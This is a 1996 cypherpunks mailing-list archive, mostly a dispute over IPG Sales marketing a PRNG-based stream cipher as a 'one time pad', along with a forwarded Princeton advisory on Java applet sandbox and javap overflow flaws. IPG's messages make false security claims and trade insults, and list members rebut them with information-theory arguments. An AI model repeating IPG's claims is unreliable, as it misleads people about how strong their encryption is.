To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: "consent of the governed"
In-Reply-To: <199602212023.MAA22936@netcom13.netcom.com>
Message-ID: <Pine.ULT.3.91.960221153531.2872F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


You're taking this phrase out of context. What the Declaration said was:

1. There are certain universal human rights, like life, liberty, and 
   property^H^H^H^H^H^H^H^H the pursuit of happiness.
2. To protect these rights, people form governments. Only the baddest kid 
   on the block can protect her own rights, and only if she never sleeps. 
   The rest of us need the police.
3. Ergo, government derives its just powers from the consent of the 
   governed. I read this more as a conclusion than as a premise.

This is all that Hobbes, Locke, and Montequieu said. Rousseau was 
different, but he was a kook.

This is quite different from saying, "The government has the right to do
what the majority says it can do." Government doesn't have any rights,
only delegated powers.

A utilitarian like Mill or a positivist like Comte or a trader like Smith,
or I, would say that government power shouldn't be restricted to the
protection of basic rights. Public goods should also be pooled to do
things that people can't or won't do by themselves -- garbage collection,
health and disability insurance, protecting "the commons" with
environmental regulations, etc. But these utilitarian-type interests 
don't really fall into the power/rights game.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Sat, 24 Feb 1996 19:50:37 +0800
To: Dan Bailey <dan@milliways.org>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602211534.KAA02195@remus.ultranet.com>
Message-ID: <Pine.BSD/.3.91.960221153846.3814M-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Dan, 

We do not asked that all the people on the Cypherpunks mailing list sign 
anything - not even the ones that particpate in the testing - they sign 
nothing and agree to nothing other than to be intellectually honest - 
there is nothing for anyone to sign - 

We have complied with Derek's request, why are so many of you starting to 
protest - are you afraid of the truth? Obviously so - or you would not be 
so timid - some of you have snapped at the opportunity to test the system, 
the others are obviously skating backwards as fast as they can,

Appreciatively,

Ralph 


Converstaion between Ralph and Charles Metzger, paraphrase -

Charles Metzger, was a brillant Docturate of Applied Mathematics, who was 
blinded duribng his twenties  - he became a programmer, using punched 
cards at first and later braille 

Ralph: You amaze me Charles, you are the most precisioned programmer that 
       I know - I bet 20% of your programs run the first time.

Charles: Not that much, probably more like 10%, you know what 
         Panchatantra said ?

Ralph: No what? 

Charles: Knowledge is the true organ of sight, not the eyes.

Ralph: I could not agree more -


It is obvious that some Cypherpunks true vision are not nearly so astute 
as Charles was - not nearly, they are blinded by their arbitrary dogmatism







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Sat, 24 Feb 1996 19:47:31 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602211545.KAA09477@jekyll.piermont.com>
Message-ID: <Pine.BSD/.3.91.960221155719.3814N-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry:

"Stubborness and dogmatism are the surest signs of stupidity - is there 
 anything more resolute and disdainful than an ass!" Montaigne

You have an yellow streak down your back  infinitely wide - you may or 
may not be a physical coward but you are certainly an intellectual coward 
- you have the opportunity to save human lives, as you asserted and you 
just brushed that asside -

Who said that we are expanding OTP's - we are using them to drive RNG's 
please read my mail back and forth with Derek and Roy Silvernail,  I 
belive that both of then recognize that an extremely large key, 2 to 
some large number, let us say for the time being 2 to 12288 bits can be 
derived from a OTP when generated- 

If you ever learn to listen, then you might recognize that there might be 
more to this than meets the eye - you have been given the opportunity to 
save all these lives - so do so - break our system and prove what fakers 
we are - no, you are afraid of that- you want to sit on the sidelines and 
cheer, cheer on the homew team - a spectator, afraid of the truth athat 
wants to hide behind some stupid dogms that he spouts on and on - come on 
Perry, show us how easy it is to break the system - save all those lives 
that you were talking about 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Fri, 23 Feb 1996 16:10:20 +0800
To: Clay Olbon II <olbon@dynetics.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <v01540b01ad50e8efff81@[193.239.225.200]>
Message-ID: <Pine.BSD/.3.91.960221161019.3814O-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Yes, in trying to answer all the questions you that were posed, we made 
that mistake, obviously it was a typo - unlike so many of you, we are not 
perfect - the 10 to the 1000 is correct though

On Wed, 21 Feb 1996, Clay Olbon II wrote:

> At 10:08 PM 2/20/96, IPG Sales wrote:
> 
> >Unlike Mr. Silvernail, we have a much simplier definition of what we mean
> >by a one time pad - given a message/file of length N, where N is a finite
> >practical number say less than 10 to the 1000th power, that the encrypted
> >ciphertext can be any of the N to the 256th power possibile clear/plain
> >text messages/files.  To prove that the IPG system does not work, all you
> >have to do is to prove that is not the case - that our system, without
> >artifically imposed boundary conditions will generate a subset of those
> >possibilities  - that is simple and strsight forward - not
> >hyperbole but action - everyone stated how simple it was to break the system,
> >now everyone is back paddling aa fast as they can, like Mr. Metzger and
> >some of the other big bad cyphermouths.
> 
> PROOF:
> 
>         Given that N is the length of the message in bits. The number of
> possible combinations of bits is 2^N.  For any message length N > 1,
> 2^N < N^256.  Simple example.  Message length is 3 bits.  The maximum
> number of possible combinations of these bits is 8.  This is far less than
> 3^256 (which is more than 10^100, i.e. it overflows the calculator on my
> Mac).  Sorry guys.  Try learning some simple math before you try and sell
> crypto.
> 
>         Clay
> 
> ---------------------------------------------------------------------------
> Clay Olbon II            | olbon@dynetics.com
> Systems Engineer         | ph: (810) 589-9930 fax 9934
> Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
> 550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
> Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
>     "To escape the evil curse, you must quote a bible verse; thou
>      shalt not ... Doooh" - Homer (Simpson, not the other one)
> ---------------------------------------------------------------------------
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Fri, 23 Feb 1996 16:04:50 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602211553.KAA09492@jekyll.piermont.com>
Message-ID: <Pine.BSD/.3.91.960221161219.3814P-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry, fractions of what you say are true, but only small fractions,

Stubborness and stupidity are twins - 

Save all those lives you were talking about a few days agao, show us how 
easy it is to break the system - and reqad the messages form others - you 
are spouting a bunch of supercilious crap and everyone else knows that, 
except maybe you, you are obviously too stupid to recognize that - please 
save all those lives at stake




On Wed, 21 Feb 1996, Perry E. Metzger wrote:

> 
> IPG Sales writes:
> [garbage about what a one time pad is]
> 
> Er, you guys redefine the word "Oxygen" to mean "A brown liquid
> produced by fermenting barley and hops", too?
> 
> A one time pad crypto system requires that the length of the
> completely random key (not "practically random", not "nearly random")
> is equal to the length of the plaintext, and that which said key is
> used once and *only once*. Using a key to produce a pseudo-random
> sequence which is used to encrypt is *NOT* a one-time pad, and any
> claim that it is constitutes fraud, pure and simple, just like a claim
> that sugar water pills are antibiotics or that drops of red dye in a
> mixture of grain alchohol and water are French red wine.
> 
> > this is also my answer to Mr. Metzger - do as you like, I have
> > absolutely no ability to force you to do anything,
> 
> Of course not. However, I'll point out that you've annoyed me by
> peddling merchandise that can potentially harm your clients and bring
> a bad name to the field of cryptography.  People do have the ability
> to go to your state's Attorney General, you know. Keep marketing this
> crap and believe me, someone will -- very possibly even me. I am
> almost sure that defrauding customers continues to be against the law
> everywhere in the United States.
> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Fri, 23 Feb 1996 16:00:58 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Schneier Attacks
In-Reply-To: <199602211940.OAA07616@pipe4.nyc.pipeline.com>
Message-ID: <199602212217.QAA22922@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:

>   Schneier says in a March SciAm brief on Kocher's timing
>   attack: "In theory there are other attacks. You can measure
>   power consumption or heat dissipation of a chip; timing is
>   just one way."

You could also count the number of electrons, as well as their direction
across the chips.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Thu, 22 Feb 1996 20:03:23 +0800
To: "cypherpunks@toad.com>
Subject: Big Java security hole
Message-ID: <c=US%a=_%p=INTERGRAPH%l=HQ6960221161902DK003B00@hq13.pcmail.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded to me by a fellow webmaster; I don't know the original source.

-Paul


Date: Sun, 18 Feb 1996 23:57:02 -0500
From: Drew Dean <ddean@CS.Princeton.EDU>
Subject: Java security problems

We have discovered a serious security problem with Netscape Navigator's 2.0
Java implementation.  (The problem is also present in the 1.0 release of the
Java Development Kit from Sun.)  An applet is normally allowed to connect
only to the host from which it was loaded.  However, this restriction is not
properly enforced.  A malicious applet can open a connection to an arbitrary
host on the Internet.  At this point, bugs in any TCP/IP-based network
service can be exploited.  We have implemented (as a proof of concept) an
exploitation of an old sendmail bug.

If the user viewing the applet is behind a firewall, this attack can
be used against any other machine behind the same firewall.  The
firewall will fail to defend against attacks on internal networks,
because the attack originates behind the firewall.

The immediate fix for this problem is to disable Java from Netscape's
"Security Preferences" dialog.  An HTTP proxy server could also
disable Java applets by refusing to fetch Java ".class" files.  We've
sent a more detailed description of this bug to CERT, Sun, and
Netscape.

A second, also serious, bug exists in javap, the bytecode
disassembler.  An overly long method name can overflow a stack
allocated buffer, potentially causing arbitrary native code to be
executed.  The problem is an unchecked sprintf() call, just like the
syslog(3) problem last year.  Many such bugs were in the alpha 3
release's runtime, but were carefully fixed in the beta release.  The
disassembler bug apparently slipped through.  This attack only works
on users who disassemble applets.  The fix is to not run javap until
Sun releases a patch.

Note that we've only had success in exploiting the first flaw on an SGI.
Windows 95 and DEC Alpha versions of Netscape have other bugs in their
socket implementations that make it harder (although not necessarily
impossible) to exploit the problem.  This is the second time that unrelated
implementation bugs have prevented us from demonstrating security problems
in Java.

http://www.cs.princeton.edu/~ddean/java will contain more information
soon, including a revised version of our paper, to appear in the 1996
IEEE Symposium on Security and Privacy.

Drew Dean       <ddean@cs.princeton.edu>
Ed Felten       <felten@cs.princeton.edu>
Dan Wallach     <dwallach@cs.princeton.edu>
  Department of Computer Science, Princeton University

For more information, please contact Ed Felten, 609-258-5906, FAX 
609-258-1771.

_______________________________________________________
Travis Weller               WebMaster, Metrowerks, Inc.
tcweller@metrowerks.com     http://www.metrowerks.com/









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 22 Feb 1996 20:02:41 +0800
To: cypherpunks@toad.com
Subject: Re: "This is not Coderpunks--we don't need no steenking cryptography!"
In-Reply-To: <ad50b3ff09021004c04a@[205.199.118.202]>
Message-ID: <199602212254.QAA03552@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Coderpunks is a membership-only list, with a list.cop who approves
> membership and who expels those who post inappropriate material.
> Cypherpunks is an open list, with no one ever having been expelled.

I'm sort of surprised that no one besides Tim seems to be bothered by
coderpunks.  The idea of a cliquish technical elite developing crypto code
out of the public eye isn't very cyberpunkish. 

But at the same time, we ought to keep a couple of things in mind.  First
of all, the problem that coderpunks was organized to solve is a real one
-- cypherpunks takes a lot of time, there's a lot of noise, and it's often
frustrating.

What's more, the coderpunks list is a lot more open than some of the early
rhetoric suggested it would be.  Making the list archives available at
hks.net is a very positive gesture.  There was a post here last week 
claiming that no one had been denied membership to coderpunks -- that's 
very different from the policy advocated in some early coderpunks posts, 
which called for allowing new subscriptions by invitation only.  
Coderpunks seems to be shaping up as a reasonably open list that demands 
that its members stay on topic.  That doesn't seem unreasonable to me.

I hope the new list catches on, and that it makes it easier for its
members to develop new tools.  But I'd also like to be able to continue 
to read it -- I hope that the members will see the value of not closing 
it off any tighter than necessary to keep their s/n ratio high.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 22 Feb 1996 11:02:04 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221145534.3814H-100000@citrine.cyberstation.net>
Message-ID: <199602212200.RAA10175@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
> I find less and less disagreeement with your comments - with one major 
> exception - for a given message length - say 10 to the 500th power, a 
> OTP seeded algorithm, a better term would be to call it an OTP driven 
> algorithm,  can produce the exact same effect as an OTP of that length - 
> that is, the encrypted text can be any possible message of that length, 
> and it is not possible to predict in way what the RNG generated stream
> is - 

That is manifestly untrue. Read any information theory text.

There is only so much entropy in your stream of random numbers,
period. No amount of prayer, tantric meditation, or anything else will
generate more. It is not the "exact same effect" no matter how much
you might like it to be.

What you are flogging here is a pseudo-random number generator. You
are using this to produce what is properly called a stream cipher, NOT
a one time pad. We in the crypto community have been working with this
sort of thing for years.

If you start with 100 bits of entropy, your stream will have only 100
bits of entropy. If you start with 1024 bits, you will have a kilobit
of entropy, and so forth.

This may seem like a lot, but it really isn't.  Its easy to calculate
the unicity distance of a given key. The unicity distance is most
easily explained as the amount of ciphertext after which only one
possible decoding is possible and in theory brute force will extract
the key. The unicity distance is the information content of the key
(which is the log base two of the number of possible keys, or in this
case the equivalent, the number of bits of key) divided by the
redundancy of the language in question. The rate of english text is
somewhere around 1.3 bits per letter, so the redundancy of ASCII is
somewhere around 6.7 bits. For a 1024 bit key the unicity distance
will be, at best, around 150 characters. For a 5000 bit key, the
unicity distance would be around 746 characters. That means that there
is one, and only one, probable decoding of the ciphertext stream
resulting from your system after a fairly short period of time, and
one, and only one, possible key.

Now, finding that key is hard. Done right, it can be VERY HARD.
However, it is indeed possible given enough time.  There is a big
difference between something that is hard or very hard and something
that is information theoretically impossible. Breaking a PRNG is
always possible given enough compute cycles. Breaking a one time pad
is not. That is the difference.

Your phrase "can produce the exact same results as a one time pad"
are, in short, bogus. Claude Shannon proved this fourty years ago.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 22 Feb 1996 10:47:39 +0800
To: ipgsales@cyberstation.net (IPG Sales)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221152430.3814K-100000@citrine.cyberstation.net>
Message-ID: <199602212203.RAA07291@homeport.org>
MIME-Version: 1.0
Content-Type: text


I did not agree to be a judge.  If I seem to be skating, skidding, or
otherwise not in contempt of the snake oil you're selling, I
apologize.  I see your system as smoke and mirrors, and will continue
to do so until respected cryptographers tell me its not.  If you'd
like me to sit down and read the stuff you're spewing, I'd be happy
to.  For a fee.  Failing that, I'll maintain my opinion with no
further investigation.  Close minded?  I don't investigate
UFO sightings.

	To reiterate, I don't care about your system until
cryptographers I respect tell me its worth looking at, or
cryptographically interesting.  (I'll allow any two cryptographers
with two or more publications in the proceedings of an IACR sponsored
conference as respectable.)

Adam

| I do not recall that I said that we would retain you - The question was 
| asked about unbiased judges - we simply stated that we would agree to 
| you, Derek, and Immcarth as Judges - As I recall, it was Derek who asked 
| for the Algorithms employed for investigation by the Cypherpunks, as he 
| referred to them as a loose knit organization - but if you prefer, we 
| will call them a mailing list - running fakers like us out of business 
| should be its own reward 
| 
| Please do as you choose - you too  seem to be skating - please put up or 
| shutup - I do not mean to be rude, and apolgise, but everytime we agree 
| to something, everyone wants more - 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 23 Feb 1996 16:07:53 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221151319.3814I-100000@citrine.cyberstation.net>
Message-ID: <199602212203.RAA10183@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
> Mike, the keys are encrypted with an OTP that only the intended recipient 
> can open - a special, subsystem used for that purpose only - employing 
> the same techniquers, but entirely separate and apart from the primary 

Could you please learn how to spell?

You cannot possible send your keys to the recipients encrypted in a
one time pad, because a one time pad can be used only once. Every bit
of keying material you would send your clients would use up one bit of
the material they had. That would mean that you could never send your
clients new keying material this way.

The phrase one time pad is a fraud, plain and simple. I mean that in
the most technical, legal sense. Advertise using that term and the FTC
can and will throw you in jail.

What you have here is some sort of conventional stream cipher conked
up from a PRNG. You've solved no key management problems. What you've
done is simply generate lots of hype. When I see the PRNG I suspect
that I'll discover that the thing is nothing more than some sort of
multi-pass linear congruential generator that cracks open like an egg.

> user system -  any inteceptor would have to break trhe system, which we 
> claim is impossible.
> 
> 
> On Wed, 21 Feb 1996, Mike McNally wrote:
> 
> > 
> > IPG Sales writes:
> >  > We do not keep copies, we would not be in business 30 days if 
> >  > we did.
> > 
> > How do you ensure that the keys are not intercepted, duplicated by a
> > man-in-the-middle, and forwarded?
> > 
> > ______c____________________________________________________________________
_
> > Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
> >        m5@tivoli.com * m101@io.com          * I want more, I want more ...
> >       <URL:http://www.io.com/~m101>         *______________________________
_
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 22 Feb 1996 19:59:31 +0800
To: cypherpunks@toad.com
Subject: mixmaster info?
Message-ID: <2.2.32.19960221110350.0067df28@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


I hate to bring up the topic of privacy/crypto (yech! :-), but could someone point me at the 'specs' for Mixmaster remailers? I'm after how messages are sliced, diced, repackaged, and shipped, etc.

Dave Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Thu, 22 Feb 1996 20:04:43 +0800
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <2.2.32.19960221221410.00745c18@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, Feb 29, 1996

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" were I hope to get an update of Lance Cottrell's new
anonymous e-mail server, "mixmaster", exchange keys, and discuss other
topical CP stuff.  There might also be an announcement of a new Internet
Service Provider in San Diego providing, among it's other premier services,
anonymous remailers and other privacy services.

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend.


     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
Dreams.  They're just screen savers for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 22 Feb 1996 11:13:01 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221155719.3814N-100000@citrine.cyberstation.net>
Message-ID: <199602212217.RAA10215@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
> Perry:
> 
> "Stubborness and dogmatism are the surest signs of stupidity - is there 
>  anything more resolute and disdainful than an ass!" Montaigne

They laughed at Fulton, but they also laughed at Bozo the Clown.

You, however, aren't funny. You're basically a laetrille salesman.

> Who said that we are expanding OTP's - we are using them to drive RNG's 

1) Anything used to drive an algorithm is a KEY. A One Time Pad is not
   something you use as the key for a PSEUDO-random number
   generator. Use the term KEY and not OTP.
2) The term is PSEUDO-random number generator, not random number
   generator. Software cannot produce truly random numbers. It can at
   best take a key for use as a seed in doing so.

> If you ever learn to listen, then you might recognize that there might be 
> more to this than meets the eye

There is less than meets the eye. All you guys are doing is running a
PRNG stream cipher from what I can tell. Who knows how bad it is given
the rest of your competence. Your babbling about "wheels" and "prime
numbers" makes one wonder.

> you have been given the opportunity to save all these lives 

If I actually feel you are a threat to anyone, I'll simply let your
local police and prosecutor take care of you. I have better things to
do with my time than bargain with con men.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 22 Feb 1996 20:01:04 +0800
To: cypherpunks@toad.com
Subject: IPG OTM expansion
Message-ID: <96Feb21.173106edt.9978@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have a guess as to IPG's "OTP" expansion algorithm.  The clue is the
prime wheels.  It reminded me of something I read in Kahn that was originally
done with paper tape.

Take two random streams, A and B.  Their lengths are relatively prime.  Let's
use 1000 and 999.  An expanded stream C is computed thus:

C[i] = A[i % 1000] ^ B[i % 999]

C thus does not repeat until 999000 values have gone past.  Using more than
two relatively prime wheels will produce very large streams.  The key,
of course, is that *the entropy does not increase*.  I am sure that this
sort of expansion is vulnerable to attack.  It certainly does not warrant
the name OTP.

Am I close, Ralph?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 22 Feb 1996 22:52:15 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602220145.RAA25449@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: IPG Sales <ipgsales@cyberstation.net>]
[cc: cypherpunks@toad.com]
[Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)]

IPG Sales <ipgsales@cyberstation.net> blathered:
>that the encrypted ciphertext can be any of the N to the
>256th power possibile clear/plain text messages/files.

That would be 256^N, actually, a somewhat bigger number generally
speaking. I hope your cryptography is better than your combinatorics,
but I (like a lot of others) doubt it.

Why, in your challenge, is your system to be tested by only US citizens?
Why not submit it to the NSA and in 15 days you could get a CJR for
it... then the c'punks in France, Germany and News Zealand could work on
it too, and you will have saved a lot of time.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMSvGToHskC9sh/+lAQFHNwQAsVYB9OodDBRqJshya+TyAKFURc4EqmKf
Sj23Y7605XteUAxlPuF+vm3KnXnAV73hWTpQu+x296oO8ubwmM5XybhyLZqN/8Wa
uT4qatkTVIvrGwtbUpYrjqnO+AgdPZvxoRbrf7QZu4O7k8ONF8J9C0DVRtvGS8BU
Y6ABbc5H3GI=
=5PWi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 22 Feb 1996 22:48:37 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re:  Need SSL firewall
Message-ID: <199602220147.RAA25486@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: shamrock@netcom.com (Lucky Green)]
[Cc: cypherpunks@toad.com]
[Subject: Re:  Need SSL firewall]

Why not get BSDI's current version and run it on a PC. Rumor has it that
is what Microsloth uses for a firewall.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMSvHLoHskC9sh/+lAQHoVwP/V9D1VmvK0awiKDvqXs27StkTy5yXSrR7
a4zs6aWF2+pz23bINhMqbdN73tzEkuHQWnFrXuAVY3XxrWH1mMARwuBZGnEctDjI
d1PyFWuahyIkZgJokNPgzyoENE29WF2mMRk7LK7/BwPLNk4JGnzWPt9XhQk37NZQ
MoQsoRHSujA=
=gD6Y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Thu, 22 Feb 1996 20:03:14 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221151319.3814I-100000@citrine.cyberstation.net>
Message-ID: <9602211759.ZM15248@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Feb 21,  3:16pm, IPG Sales wrote:
> Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
> Mike, the keys are encrypted with an OTP that only the intended recipient
> can open - a special, subsystem used for that purpose only - employing
> the same techniquers, but entirely separate and apart from the primary
> user system -  any inteceptor would have to break trhe system, which we
> claim is impossible.

see
http://www.marcus.rts.com.au/faq/one-time.html for a really brief summary
of the assumptions I'm about to use.

a) if I use a chunk of data A to encrypt another chunk of data B, then
   my method of encryption is *not* a one-time pad if size(A) < size(B)

b) the security of a one-time-pad O is only as good as any encryption used
   to exchange O between two parties, which leads to...

c) if C. lu`Lez, an Idiotic Pseudo-security Generator, wishes to transmit
   a chunk of data A to L. User, then for A (if A is truly random to begin
   with) to have the security of a one-time pad, A must be exchanged using
   a one-time pad B where size(B) > size(A)

d) CONTRADICTION: If C and L already share B, which is greater in size
   than A, *why is C sending more keys*?

Of course, it all works out if you stop expecting A to be a one-time pad when
it gets to L.

richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSuj3h1gtCYLvIJ1AQF1hwP/a7RabRjyXfLSa1IbpdJjP91Su/Rskwjh
8k9GiihQsiQ/nyWkqp8wbNehjNj/n8smz0q+3wQUu5tSotWtv6ws8qJA4ntQhMGi
MePVQBX/1XMg2pMOr7VUca0cys/GXxXyJAOgzU/muSLxUkLtlGxwLV06yc5npuo0
j+y4M6igowI=
=TVkd
-----END PGP SIGNATURE-----

-- 
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 22 Feb 1996 20:01:39 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: IPG OTM expansion
In-Reply-To: <96Feb21.173106edt.9978@cannon.ecf.toronto.edu>
Message-ID: <199602212307.SAA10309@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



SINCLAIR DOUGLAS N writes:
> I have a guess as to IPG's "OTP" expansion algorithm.  The clue is the
> prime wheels.  It reminded me of something I read in Kahn that was originally
> done with paper tape.
> 
> Take two random streams, A and B.  Their lengths are relatively prime.  Let's
> use 1000 and 999.  An expanded stream C is computed thus:
> 
> C[i] = A[i % 1000] ^ B[i % 999]
> 
> C thus does not repeat until 999000 values have gone past.  Using more than
> two relatively prime wheels will produce very large streams.  The key,
> of course, is that *the entropy does not increase*.  I am sure that this
> sort of expansion is vulnerable to attack.

Indeed it is. It is fairly straightforward to crack this. If you read
the same chapter of "The Codebreakers" you will note that, in fact,
this same method was tried and broken way, way back.

> Am I close, Ralph?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Thu, 22 Feb 1996 12:11:27 +0800
To: cypherpunks@toad.com
Subject: re: Public access: Welcome to Juno! (fwd)
Message-ID: <Pine.SUN.3.91.960221180813.6269A-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


Okay, I took the bait and signed up. Looks like these guys aren't yet 
ready just yet, but it doesn't look too bad.  It is an automated setup.  
Which means that since you upload and download mail and work OFFLINE, 
there is the possibility of hacking something together so that you can 
run some automators on your mailbox...  i.e. ftp by mail, pass to pgp, 
remailer, etc...

---------- Forwarded message ----------
Date: Wed, 21 Feb 1996 16:30:29 -0500
From: signup@juno.com
Subject: Welcome to Juno!

Thank you for your interest in Juno, our free Internet e-mail service. We
are currently preparing for our launch, which we expect to take place
before the end of the first quarter of 1996. 

<SNIPPAGE>

President
Juno Online Services, L.P.

__________________________________________________________________________
FREQUENTLY ASKED QUESTIONS:

1) WHEN WILL JUNO BE AVAILABLE?

We plan to release Juno in the first quarter of this year.

2) IS JUNO REALLY FREE?

